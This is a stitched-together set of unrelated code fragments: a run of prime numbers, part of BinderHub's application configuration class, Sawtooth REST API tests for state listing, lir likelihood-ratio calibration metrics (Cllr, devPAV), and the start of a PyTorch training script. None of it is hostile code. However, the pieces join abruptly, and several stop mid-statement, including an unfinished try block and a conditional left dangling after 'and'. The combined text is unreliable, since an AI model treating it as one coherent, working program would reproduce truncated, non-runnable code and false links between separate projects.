919591, 919613, 919621, 919631, 919679, 919691, 919693, 919703,
919729, 919757, 919759, 919769, 919781, 919799, 919811, 919817,
919823, 919859, 919871, 919883, 919901, 919903, 919913, 919927,
919937, 919939, 919949, 919951, 919969, 919979, 920011, 920021,
920039, 920053, 920107, 920123, 920137, 920147, 920149, 920167,
920197, 920201, 920203, 920209, 920219, 920233, 920263, 920267,
920273, 920279, 920281, 920291, 920323, 920333, 920357, 920371,
920377, 920393, 920399, 920407, 920411, 920419, 920441, 920443,
920467, 920473, 920477, 920497, 920509, 920519, 920539, 920561,
920609, 920641, 920651, 920653, 920677, 920687, 920701, 920707,
920729, 920741, 920743, 920753, 920761, 920783, 920789, 920791,
920807, 920827, 920833, 920849, 920863, 920869, 920891, 920921,
920947, 920951, 920957, 920963, 920971, 920999, 921001, 921007,
921013, 921029, 921031, 921073, 921079, 921091, 921121, 921133,
921143, 921149, 921157, 921169, 921191, 921197, 921199, 921203,
921223, 921233, 921241, 921257, 921259, 921287, 921293, 921331,
921353, 921373, 921379, 921407, 921409, 921457, 921463, 921467,
921491, 921497, 921499, 921517, 921523, 921563, 921581, 921589,
921601, 921611, 921629, 921637, 921643, 921647, 921667, 921677,
921703, 921733, 921737, 921743, 921749, 921751, 921761, 921779,
921787, 921821, 921839, 921841, 921871, 921887, 921889, 921901,
921911, 921913, 921919, 921931, 921959, 921989, 922021, 922027,
922037, 922039, 922043, 922057, 922067, 922069, 922073, 922079,
922081, 922087, 922099, 922123, 922169, 922211, 922217, 922223,
922237, 922247, 922261, 922283, 922289, 922291, 922303, 922309,
922321, 922331, 922333, 922351, 922357, 922367, 922391, 922423,
922451, 922457, 922463, 922487, 922489, 922499, 922511, 922513,
922517, 922531, 922549, 922561, 922601, 922613, 922619, 922627,
922631, 922637, 922639, 922643, 922667, 922679, 922681, 922699,
922717, 922729, 922739,
# Repository: willingc/binderhub
"""
The binderhub application
"""
import asyncio
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import re
from glob import glob
from urllib.parse import urlparse
import kubernetes.client
import kubernetes.config
from jinja2 import Environment, FileSystemLoader, PrefixLoader, ChoiceLoader
from tornado.httpclient import AsyncHTTPClient
from tornado.httpserver import HTTPServer
import tornado.ioloop
import tornado.options
import tornado.log
from tornado.log import app_log
import tornado.web
from traitlets import Unicode, Integer, Bool, Dict, validate, TraitError, default
from traitlets.config import Application
from jupyterhub.services.auth import HubOAuthCallbackHandler
from .base import Custom404
from .build import Build
from .builder import BuildHandler
from .launcher import Launcher
from .registry import DockerRegistry
from .main import MainHandler, ParameterizedMainHandler, LegacyRedirectHandler
from .repoproviders import GitHubRepoProvider, GitRepoProvider, GitLabRepoProvider, GistRepoProvider
from .metrics import MetricsHandler
from .utils import ByteSpecification, url_path_join
from .events import EventLog
HERE = os.path.dirname(os.path.abspath(__file__))
class BinderHub(Application):
"""An Application for starting a builder."""
@default('log_level')
def _log_level(self):
return logging.INFO
aliases = {
'log-level': 'Application.log_level',
'f': 'BinderHub.config_file',
'config': 'BinderHub.config_file',
'port': 'BinderHub.port',
}
flags = {
'debug': (
{'BinderHub': {'debug': True}},
"Enable debug HTTP serving & debug logging"
)
}
config_file = Unicode(
'binderhub_config.py',
help="""
Config file to load.
If a relative path is provided, it is taken relative to current directory
""",
config=True
)
google_analytics_code = Unicode(
None,
allow_none=True,
help="""
The Google Analytics code to use on the main page.
Note that we'll respect Do Not Track settings, despite the fact that GA does not.
We will not load the GA scripts on browsers with DNT enabled.
""",
config=True
)
google_analytics_domain = Unicode(
'auto',
help="""
The Google Analytics domain to use on the main page.
By default this is set to 'auto', which sets it up for current domain and all
subdomains. This can be set to a more restrictive domain here for better privacy
""",
config=True
)
extra_footer_scripts = Dict(
{},
help="""
Extra bits of JavaScript that should be loaded in footer of each page.
Only the values are set up as scripts. Keys are used only
for sorting.
Omit the <script> tag. This should be primarily used for
analytics code.
""",
config=True
)
base_url = Unicode(
'/',
help="The base URL of the entire application",
config=True)
@validate('base_url')
def _valid_base_url(self, proposal):
if not proposal.value.startswith('/'):
proposal.value = '/' + proposal.value
if not proposal.value.endswith('/'):
proposal.value = proposal.value + '/'
return proposal.value
auth_enabled = Bool(
False,
help="""If JupyterHub authentication enabled,
require user to login (don't create temporary users during launch) and
start the new server for the logged in user.""",
config=True)
use_named_servers = Bool(
False,
help="Use named servers when authentication is enabled.",
config=True)
port = Integer(
8585,
help="""
Port for the builder to listen on.
""",
config=True
)
appendix = Unicode(
help="""
Appendix to pass to repo2docker
A multi-line string of Docker directives to run.
Since the build context cannot be affected,
ADD will typically not be useful.
This should be a Python string template.
It will be formatted with at least the following names available:
- binder_url: the shareable URL for the current image
(e.g. for sharing links to the current Binder)
- repo_url: the repository URL used to build the image
""",
config=True,
)
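# An illustrative value as it might appear in binderhub_config.py; the Docker
# directives below are hypothetical examples, not required settings:
#     c.BinderHub.appendix = """
#     LABEL binder.url="{binder_url}"
#     LABEL repo.url="{repo_url}"
#     """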
use_registry = Bool(
True,
help="""
Set to true to push images to a registry & check for images in registry.
Set to false to use only local docker images. Useful when running
in a single node.
""",
config=True
)
per_repo_quota = Integer(
0,
help="""
Maximum number of concurrent users running from a given repo.
Limits the amount of Binder that can be consumed by a single repo.
0 (default) means no quotas.
""",
config=True,
)
log_tail_lines = Integer(
100,
help="""
Limit number of log lines to show when connecting to an already running build.
""",
config=True,
)
push_secret = Unicode(
'binder-push-secret',
allow_none=True,
help="""
A kubernetes secret object that provides credentials for pushing built images.
""",
config=True
)
image_prefix = Unicode(
"",
help="""
Prefix for all built docker images.
If you are pushing to gcr.io, this would start with:
gcr.io/<your-project-name>/
Set according to whatever registry you are pushing to.
Defaults to "", which is probably not what you want :)
""",
config=True
)
build_memory_limit = ByteSpecification(
0,
help="""
Max amount of memory allocated for each image build process.
0 sets no limit.
This is used as both the memory limit & request for the pod
that is spawned to do the building, even though the pod itself
will not be using that much memory since the docker building is
happening outside the pod. However, it makes kubernetes aware of
the resources being used, and lets it schedule more intelligently.
""",
config=True
)
debug = Bool(
False,
help="""
Turn on debugging.
""",
config=True
)
build_docker_host = Unicode(
"/var/run/docker.sock",
config=True,
help="""
The docker URL repo2docker should use to build the images.
Currently, only paths are supported, and they are expected to be available on
all the hosts.
"""
)
@validate('build_docker_host')
def docker_build_host_validate(self, proposal):
parts = urlparse(proposal.value)
if parts.scheme != 'unix' or parts.netloc != '':
raise TraitError("Only unix domain sockets on same node are supported for build_docker_host")
return proposal.value
hub_api_token = Unicode(
help="""API token for talking to the JupyterHub API""",
config=True,
)
@default('hub_api_token')
def _default_hub_token(self):
return os.environ.get('JUPYTERHUB_API_TOKEN', '')
hub_url = Unicode(
help="""
The base URL of the JupyterHub instance where users will run.
e.g. https://hub.mybinder.org/
""",
config=True,
)
@validate('hub_url')
def _add_slash(self, proposal):
"""trait validator to ensure hub_url ends with a trailing slash"""
if proposal.value is not None and not proposal.value.endswith('/'):
return proposal.value + '/'
return proposal.value
build_namespace = Unicode(
'default',
help="""
Kubernetes namespace to spawn build pods in.
Note that the push_secret must refer to a secret in this namespace.
""",
config=True
)
build_image = Unicode(
'jupyter/repo2docker:2ebc87b',
help="""
The repo2docker image to be used for doing builds
""",
config=True
)
build_node_selector = Dict(
{},
config=True,
help="""
Select the node where build pod runs on.
"""
)
repo_providers = Dict(
{
'gh': GitHubRepoProvider,
'gist': GistRepoProvider,
'git': GitRepoProvider,
'gl': GitLabRepoProvider,
},
config=True,
help="""
List of Repo Providers to register and try
"""
)
concurrent_build_limit = Integer(
32,
config=True,
help="""The number of concurrent builds to allow."""
)
executor_threads = Integer(
5,
config=True,
help="""The number of threads to use for blocking calls
Should generally be a small number because we don't
care about high concurrency here, just not blocking the webserver.
This executor is not used for long-running tasks (e.g. builds).
""",
)
build_cleanup_interval = Integer(
60,
config=True,
help="""Interval (in seconds) for how often stopped build pods will be deleted."""
)
build_max_age = Integer(
3600 * 4,
config=True,
help="""Maximum age of builds
Builds that are still running longer than this
will be killed.
"""
)
# FIXME: Come up with a better name for it?
builder_required = Bool(
True,
config=True,
help="""
Whether a working build infrastructure is required for BinderHub to run.
Build infrastructure is a Kubernetes cluster + Docker. Set this to False to run without one, which is useful for pure HTML/CSS/JS local development.
"""
)
tornado_settings = Dict(
config=True,
help="""
additional settings to pass through to tornado.
can include things like additional headers, etc.
"""
)
template_variables = Dict(
config=True,
help="Extra variables to supply to jinja templates when rendering.",
)
template_path = Unicode(
help="Path to search for custom jinja templates, before using the default templates.",
config=True,
)
@default('template_path')
def _template_path_default(self):
return os.path.join(HERE, 'templates')
extra_static_path = Unicode(
help='Path to search for extra static files.',
config=True,
)
extra_static_url_prefix = Unicode(
'extra_static/',
help='Url prefix to serve extra static files.',
config=True,
)
@staticmethod
def add_url_prefix(prefix, handlers):
"""add a url prefix to handlers"""
for i, tup in enumerate(handlers):
lis = list(tup)
lis[0] = url_path_join(prefix, tup[0])
handlers[i] = tuple(lis)
return handlers
def init_pycurl(self):
try:
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
except ImportError as e:
self.log.debug("Could not load pycurl: %s\npycurl is recommended if you have a large number of users.", e)
# set max verbosity of curl_httpclient at INFO
# because debug-logging from curl_httpclient
# includes every full request and response
if self.log_level < logging.INFO:
curl_log = logging.getLogger('tornado.curl_httpclient')
curl_log.setLevel(logging.INFO)
def initialize(self, *args, **kwargs):
"""Load configuration settings."""
super().initialize(*args, **kwargs)
self.load_config_file(self.config_file)
# hook up tornado logging
if self.debug:
self.log_level = logging.DEBUG
tornado.options.options.logging = logging.getLevelName(self.log_level)
tornado.log.enable_pretty_logging()
self.log = tornado.log.app_log
self.init_pycurl()
# initialize kubernetes config
if self.builder_required:
try:
kubernetes.config.load_incluster_config()
# File: rest_api/tests/unit/test_state_requests.py
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
from base64 import b64decode
from aiohttp.test_utils import unittest_run_loop
from components import Mocks, BaseApiTest
from sawtooth_rest_api.protobuf.validator_pb2 import Message
from sawtooth_rest_api.protobuf import client_state_pb2
from sawtooth_rest_api.protobuf import client_block_pb2
from sawtooth_rest_api.protobuf import block_pb2
ID_A = 'a' * 128
ID_B = 'b' * 128
ID_C = 'c' * 128
ID_D = 'd' * 128
DEFAULT_LIMIT = 100
class StateListTests(BaseApiTest):
async def get_application(self):
self.set_status_and_connection(
Message.CLIENT_STATE_LIST_REQUEST,
client_state_pb2.ClientStateListRequest,
client_state_pb2.ClientStateListResponse)
handlers = self.build_handlers(self.loop, self.connection)
return self.build_app(self.loop, '/state', handlers.list_state)
@unittest_run_loop
async def test_state_list(self):
"""Verifies a GET /state without parameters works properly.
It will receive a Protobuf response with:
- a state root of ID_C
- a paging response with start of "a" and a limit of 100
- three entries with addresses/data of:
* 'a': b'3'
* 'b': b'5'
* 'c': b'7'
It should send a Protobuf request with:
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_C
- a link property that ends in
/state?head={}&start=a&limit=100'.format(ID_C)
- a paging property that matches the paging response
- a data property that is a list of 3 leaf dicts
- three entries that match those in Protobuf response
"""
paging = Mocks.make_paging_response("", "a", DEFAULT_LIMIT)
entries = Mocks.make_entries(a=b'3', b=b'5', c=b'7')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_C,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state')
controls = Mocks.make_paging_controls()
self.connection.assert_valid_request_sent(
state_root='beef', paging=controls)
self.assert_has_valid_head(response, ID_C)
self.assert_has_valid_link(
response, '/state?head={}&start=a&limit=100'.format(ID_C))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 3)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_validator_error(self):
"""Verifies a GET /state with a validator error breaks properly.
It will receive a Protobuf response with:
- a status of INTERNAL_ERROR
It should send back a JSON response with:
- a status of 500
- an error property with a code of 10
"""
self.connection.preset_response(self.status.INTERNAL_ERROR)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block())
response = await self.get_assert_status('/state', 500)
self.assert_has_valid_error(response, 10)
@unittest_run_loop
async def test_state_list_with_no_genesis(self):
"""Verifies a GET /state with validator not ready breaks properly.
It will receive a Protobuf response with:
- a status of NOT_READY
It should send back a JSON response with:
- a status of 503
- an error property with a code of 15
"""
self.connection.preset_response(self.status.NOT_READY)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block())
response = await self.get_assert_status('/state', 503)
self.assert_has_valid_error(response, 15)
@unittest_run_loop
async def test_state_list_with_head(self):
"""Verifies a GET /state works properly with head specified.
It will receive a Protobuf response with:
- a head id of ID_B
- a paging response with start of a and limit of 100
- two entries with addresses/data of:
* 'a': b'2'
* 'b': b'4'
It should send a Protobuf request with:
- a head_id property of ID_B
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_B
- a link property that ends in
'/state?head={}&start=a&limit=100'.format(ID_B)
- a paging property that matches the paging response
- a data property that is a list of 2 leaf dicts
- three entries that match those in Protobuf response
"""
paging = Mocks.make_paging_response("", "a", DEFAULT_LIMIT)
entries = Mocks.make_entries(a=b'2', b=b'4')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_B,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?head={}'.format(ID_B))
controls = Mocks.make_paging_controls()
self.connection.assert_valid_request_sent(
state_root='beef', paging=controls)
self.assert_has_valid_head(response, ID_B)
self.assert_has_valid_link(
response, '/state?head={}&start=a&limit=100'.format(ID_B))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 2)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_bad_head(self):
"""Verifies a GET /state breaks properly with a bad head specified.
It will receive a Protobuf response with:
- a status of NO_ROOT
It should send back a JSON response with:
- a response status of 404
- an error property with a code of 50
"""
self.connection.preset_response(self.status.NO_ROOT)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block())
response = await self.get_assert_status('/state?head={}'.format(ID_D),
404)
self.assert_has_valid_error(response, 50)
@unittest_run_loop
async def test_state_list_with_address(self):
"""Verifies a GET /state works properly filtered by address.
It will receive a Protobuf response with:
- a head id of ID_C
- an empty paging response
- one leaf with addresses/data of: 'c': b'7'
It should send a Protobuf request with:
- an address property of 'c'
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_C
- a link property that ends in
'/state?head={}&start=c&limit=100&address=c'.format(ID_C)
- a paging property that matches the paging response
- a data property that is a list of 1 leaf dict
- one leaf that matches the Protobuf response
"""
paging = Mocks.make_paging_response("", "c", DEFAULT_LIMIT)
entries = Mocks.make_entries(c=b'7')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_C,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?address=c')
controls = Mocks.make_paging_controls()
self.connection.assert_valid_request_sent(
state_root='beef', address='c', paging=controls)
self.assert_has_valid_head(response, ID_C)
self.assert_has_valid_link(
response,
'/state?head={}&start=c&limit=100&address=c'.format(ID_C))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 1)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_bad_address(self):
"""Verifies a GET /state breaks properly filtered by a bad address.
It will receive a Protobuf response with:
- a status of NO_RESOURCE
- a head id of ID_C
It should send back a JSON response with:
- a response status of 200
- a head property of ID_C
- a link property that ends in
'/state?head={}&start=c&limit=100&address=bad'.format(ID_C)
- a paging property with only a total_count of 0
- a data property that is an empty list
"""
paging = Mocks.make_paging_response("", "c", DEFAULT_LIMIT)
self.connection.preset_response(
self.status.NO_RESOURCE,
state_root='beef',
paging=paging)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_C,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?address=bad')
self.assert_has_valid_head(response, ID_C)
self.assert_has_valid_link(
response,
'/state?head={}&start=c&limit=100&address=bad'.format(ID_C))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 0)
@unittest_run_loop
async def test_state_list_with_head_and_address(self):
"""Verifies GET /state works with a head and filtered by address.
It will receive a Protobuf response with:
- a head id of ID_B
- a paging response with a start of a and a limit of 100
- one leaf with addresses/data of: 'a': b'2'
It should send a Protobuf request with:
- a head_id property of ID_B
- an address property of 'a'
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_B
- a link property that ends in
'/state?head={}&start=a&limit=100&address=a'.format(ID_B)
- a paging property that matches the paging response
- a data property that is a list of 1 leaf dict
- one leaf that matches the Protobuf response
"""
paging = Mocks.make_paging_response("", "a", DEFAULT_LIMIT)
entries = Mocks.make_entries(a=b'2')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_B,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200(
'/state?address=a&head={}'.format(ID_B))
self.connection.assert_valid_request_sent(
state_root='beef',
address='a',
paging=Mocks.make_paging_controls())
self.assert_has_valid_head(response, ID_B)
self.assert_has_valid_link(
response,
'/state?head={}&start=a&limit=100&address=a'.format(ID_B))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 1)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_paginated(self):
"""Verifies GET /state paginated by works properly.
It will receive a Protobuf response with:
- a head id of ID_D
- a paging response with a start of 2
- one leaf of {'c': b'3'}
It should send a Protobuf request with:
- a paging controls with a limit of 1, and a start of 1
It should send back a JSON response with:
- a response status of 200
- a head property of ID_D
- a link property that ends in
'/state?head={}&start=c&limit=1'.format(ID_D)
- paging that matches the response, with next and previous links
- a data property that is a list of 1 dict
- and that dict is a leaf that matches the one received
"""
paging = Mocks.make_paging_response("b", "c", 1)
entries = Mocks.make_entries(c=b'3')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_D,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?start=c&limit=1')
controls = Mocks.make_paging_controls(1, start="c")
self.connection.assert_valid_request_sent(
state_root='beef', paging=controls)
self.assert_has_valid_head(response, ID_D)
self.assert_has_valid_link(
response, '/state?head={}&start=c&limit=1'.format(ID_D))
self.assert_has_valid_paging(
response, paging, '/state?head={}&start=b&limit=1'.format(ID_D))
self.assert_has_valid_data_list(response, 1)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_zero_limit(self):
"""Verifies a GET /state with a limit of zero breaks properly.
It should send back a JSON response with:
- a response status of 400
- an error property with a code
# Repository: HolmesNL/lir
import collections
import warnings
import numpy as np
from .calibration import IsotonicCalibrator
from .util import Xn_to_Xy, Xy_to_Xn, to_probability, LR
LrStats = collections.namedtuple('LrStats',
['avg_log2lr', 'avg_log2lr_class0', 'avg_log2lr_class1', 'avg_p0_class0', 'avg_p1_class0',
'avg_p0_class1', 'avg_p1_class1', 'cllr_class0', 'cllr_class1', 'cllr', 'lr_class0',
'lr_class1', 'cllr_min', 'cllr_cal'])
def cllr(lrs, y, weights=(1, 1)):
"""
Calculates a log likelihood ratio cost (C_llr) for a series of likelihood
ratios.
<NAME> and <NAME>, Application-independent evaluation of speaker detection, In: Computer Speech and
Language 20(2-3), 2006.
Parameters
----------
lrs : a numpy array of LRs
y : a numpy array of labels (0 or 1)
Returns
-------
cllr
the log likelihood ratio cost
"""
# ignore errors:
# divide -> ignore divide by zero
# over -> ignore scalar overflow
with np.errstate(divide='ignore', over='ignore'):
lrs0, lrs1 = Xy_to_Xn(lrs, y)
cllr0 = weights[0] * np.mean(np.log2(1 + lrs0)) if weights[0] > 0 else 0
cllr1 = weights[1] * np.mean(np.log2(1 + 1 / lrs1)) if weights[1] > 0 else 0
return (cllr0 + cllr1) / sum(weights)
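# For reference: with class-0 LRs s_i, class-1 LRs t_j and weights (w0, w1),
# the value returned above is
#     Cllr = (w0 * mean_i(log2(1 + s_i)) + w1 * mean_j(log2(1 + 1/t_j))) / (w0 + w1)
# which reduces to the standard definition when w0 = w1 = 1.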
def cllr_min(lrs, y, weights=(1, 1)):
"""
Estimates the discriminative power from a collection of likelihood ratios.
Parameters
----------
lrs : a numpy array of LRs
y : a numpy array of labels (0 or 1)
Returns
-------
cllr_min
the log likelihood ratio cost
"""
cal = IsotonicCalibrator()
lrmin = cal.fit_transform(to_probability(lrs), y)
return cllr(lrmin, y, weights)
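# Note: cllr_min is Cllr recomputed after isotonic (PAV) recalibration of the
# LRs, i.e. the discrimination-only part of Cllr; the gap cllr - cllr_min
# (the cllr_cal field of LrStats above) is commonly interpreted as the
# calibration loss.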
def devpav_estimated(lrs, y, resolution=1000):
"""
Estimate devPAV, a metric for calibration.
devPAV is the cumulative deviation of the PAV transformation from
the identity line. It is calculated in the LR range where misleading LRs
occur.
See also: <NAME>, Measuring calibration of likelihood ratio systems: a
comparison of four systems, including a new metric devPAV, to appear
This implementation estimates devPAV by calculating the average deviation
for a large number of LRs.
Parameters
----------
lrs : a numpy array of LRs
y : a numpy array of labels (0 or 1)
resolution : the number of measurements in the range of misleading evidence; a higher value yields a more accurate estimation
Returns
-------
devPAV
an estimation of devPAV
"""
lrs0, lrs1 = Xy_to_Xn(lrs, y)
if len(lrs0) == 0 or len(lrs1) == 0:
raise ValueError('devpav: illegal input: at least one value is required for each class')
# find misleading LR extremes
first_misleading = np.min(lrs1)
last_misleading = np.max(lrs0)
if first_misleading > last_misleading: # test for perfect discrimination
return 0
if np.isinf(first_misleading) or np.isinf(last_misleading): # test for infinitely misleading LRs
return np.inf
# calibrate on the input LRs
cal = IsotonicCalibrator()
cal.fit_transform(to_probability(lrs), y)
# take `resolution` points evenly divided along the range of misleading LRs
xlr = np.exp(np.linspace(np.log(first_misleading), np.log(last_misleading), resolution))
pavlr = cal.transform(to_probability(xlr))
devlr = np.absolute(np.log10(xlr) - np.log10(pavlr))
return (np.sum(devlr) / resolution) * (np.log10(last_misleading) - np.log10(first_misleading))
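# Minimal usage sketch with hypothetical toy arrays (any LRs/labels work):
#     lrs = np.array([0.5, 0.8, 2.0, 4.0])
#     y = np.array([0, 0, 1, 1])
#     print(cllr(lrs, y), cllr_min(lrs, y), devpav_estimated(lrs, y))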
def calcsurface_f(c1, c2):
"""
Helperfunction that calculates the desired surface for two xy-coordinates
"""
# step 1: calculate the intersection (xs, ys) of the straight line through the coordinates with the identity line (if the slope a = 1, there is no intersection and the surface of this parallelogram equals deltaY * deltaX)
x1, y1 = c1
x2, y2 = c2
a = (y2 - y1) / (x2 - x1)
if a == 1:
# then xs equals +/- infinity and there is no intersection with the identity line
# since condition 1 holds the product below is always positive
surface = (y2 - y1) * (x2 - x1)
elif (a < 0):
raise ValueError(f"slope is negative; impossible for PAV-transform. Coordinates are {c1} and {c2}. Calculated slope is {a}")
else:
# then xs is finite:
b = y1 - a * x1
xs = b / (1 - a)
# xs
# step 2: check if intersection is located within line segment c1 and c2.
if x1 < xs and x2 >= xs:
# then intersection is within
# (situation 1 of 2) if y1 <= x1 then the surface is:
if y1 <= x1:
surface = 0.5 * (xs - y1) * (xs - x1) - 0.5 * (xs - x1) * (xs - x1) + 0.5 * (y2 - xs) * (x2 - xs) - 0.5 * (
x2 - xs) * (x2 - xs)
else:
# (situation 2 of 2) then y1 > x1, and the surface is:
surface = 0.5 * (xs - x1) ** 2 - 0.5 * (xs - y1) * (xs - x1) + 0.5 * (x2 - xs) ** 2 - 0.5 * (x2 - xs) * (
y2 - xs)
# this is the same as 0.5 * (xs - x1) * (xs - y1) - 0.5 * (xs - y1) * (xs - y1) + 0.5 * (y2 - xs) * (x2 - xs) - 0.5 * (y2 - xs) * (y2 - xs) + 0.5 * (y1 - x1) * (y1 - x1) + 0.5 * (x2 - y2) * (x2 - y2)
else: # then intersection is not within line segment
# if (situation 1 of 4) y1 <= x1 AND y2 <= x1, and surface is
if y1 <= x1 and y2 <= x1:
surface = 0.5 * (y2 - y1) * (x2 - x1) + (x1 - y2) * (x2 - x1) + 0.5 * (x2 - x1) * (x2 - x1)
elif y1 > x1: # (situation 2 of 4) then y1 > x1, and surface is
surface = 0.5 * (x2 - x1) * (x2 - x1) + (y1 - x2) * (x2 - x1) + 0.5 * (y2 - y1) * (x2 - x1)
elif y1 <= x1 and y2 > x1: # (situation 3 of 4). This should be the last possibility.
surface = 0.5 * (y2 - y1) * (x2 - x1) - 0.5 * (y2 - x1) * (y2 - x1) + 0.5 * (x2 - y2) * (x2 - y2)
else:
# situation 4 of 4: this situation should never appear. There is a fourth situation analogous to situation 3, but above the identity line. However, this is impossible by definition of a PAV transform (y2 > x1).
raise ValueError(f"unexpected coordinate combination: ({x1}, {y1}) and ({x2}, {y2})")
return surface
def _devpavcalculator(lrs, pav_lrs, y):
"""
Calculates devPAV from a PAV result for same-source (SS) and different-source (DS) LRs.
Input: lrs = np.array of LR values. pav_lrs = np.array with the result of the PAV transform applied to lrs. y = np.array of labels (1 for H1 and 0 for H2)
Output: devPAV value
"""
DSLRs, SSLRs = Xy_to_Xn(lrs,y)
DSPAVLRs, SSPAVLRs = Xy_to_Xn(pav_lrs, y)
PAVresult = np.concatenate([SSPAVLRs, DSPAVLRs])
Xen = np.concatenate([SSLRs, DSLRs])
# order coordinates by x, then y, and filter out identical data points
data = np.unique(np.array([Xen, PAVresult]), axis=1)
Xen = data[0,:]
Yen = data[1,:]
# pathological cases
# check if min(Xen) = 0 or max(Xen) = Inf. First min(Xen)
# first of three: if Xen[0] == 0 and Xen[len(Xen)-1] != Inf
if Xen[0] == 0 and Xen[-1] != np.inf:
if Yen[0] == 0 and Yen[1] != 0:
# then a line in the PAV transform runs to {Inf, -Inf} parallel to the line y = x
return (np.absolute(np.log10(Xen[1]) - np.log10(Yen[1])))
else:
# then Yen[0] is finite or Yen[1] equals 0, and somewhere a horizontal line runs to log(Xen[0]) = -Inf; devPAV becomes infinite
return np.inf
# second of three: if Xen[len(Xen)-1] == Inf and Xen[0] != 0
elif Xen[0] != 0 and Xen[-1] == np.inf:
if Yen[len(Yen) - 1] == np.inf and Yen[len(Yen) - 2] != np.inf:
# then a line in the PAV transform runs to {Inf, -Inf} parallel to the line y = x
return (np.absolute(np.log10(Xen[len(Xen) - 2]) - np.log10(Yen[len(Yen) - 2])))
else:
# then Yen[len(Yen)-1] is finite or Yen[len(Yen)-2] equals Inf, and somewhere a horizontal line runs to log(Xen[len(Xen)-1]) = Inf; devPAV becomes infinite
return np.inf
# third of three: if Xen[0] == 0 and Xen[len(Xen)-1] == Inf
elif Xen[0] == 0 and Xen[-1] == np.inf:
if Yen[len(Yen) - 1] == np.inf and Yen[len(Yen) - 2] != np.inf and
# -*- coding: utf-8 -*-
"""Master training script"""
__author__ = "<NAME>"
__copyright__ = "MIT"
import datetime
import os
import sys
import random
import json
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from torch.optim import SGD, Adam
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from dtor.utilities.utils import focal_loss
from dtor.utilities.utils_stats import roc_and_auc
from dtor.utilities.torchutils import EarlyStopping
from dtor.utilities.torchutils import process_metrics, \
METRICS_LOSS_NDX, METRICS_LABEL_NDX, METRICS_PRED_NDX, METRICS_SIZE
from dtor.loss.sam import SAM
import joblib
import optuna
from optuna.samplers import TPESampler
from dtor.logconf import enumerate_with_estimate
from dtor.logconf import logging
from dtor.utilities.utils import find_folds, get_class_weights
from dtor.utilities.model_retriever import model_choice
from dtor.utilities.data_retriever import get_data
from dtor.opts import init_parser
from dtor.opts import norms
log = logging.getLogger(__name__)
# log.setLevel(logging.WARN)
log.setLevel(logging.INFO)
log.setLevel(logging.DEBUG)
class TrainerBase:
def __init__(self, sys_argv=None):
if sys_argv is None:
sys_argv = sys.argv[1:]
self.totalTrainingSamples_count = 0
self.model = None
self.weights = None
self.trn_writer = None
self.val_writer = None
self.optimizer = None
self.scheduler = None
self.train_dl = None
self.val_dl = None
self.study = None
self.sample = None
self.init_dict = {}
self.root_dir = os.environ["DTORROOT"]
parser = init_parser()
args = parser.parse_args(sys_argv)
if args.load_json:
with open(args.load_json, 'r') as f:
args.__dict__.update(json.load(f))
self.cli_args = args
if self.cli_args.best_json:
with open(self.cli_args.best_json, 'r') as f:
self.cli_args.__dict__.update(json.load(f))
self.use_cuda = torch.cuda.is_available()
self.device = torch.device("cuda" if self.use_cuda else "cpu")
# Needed to make training reproducible
self.reset_torch_seeds()
self.reset_rndm()
# Make all tunable hyperparameters members
self.patience = self.cli_args.earlystopping
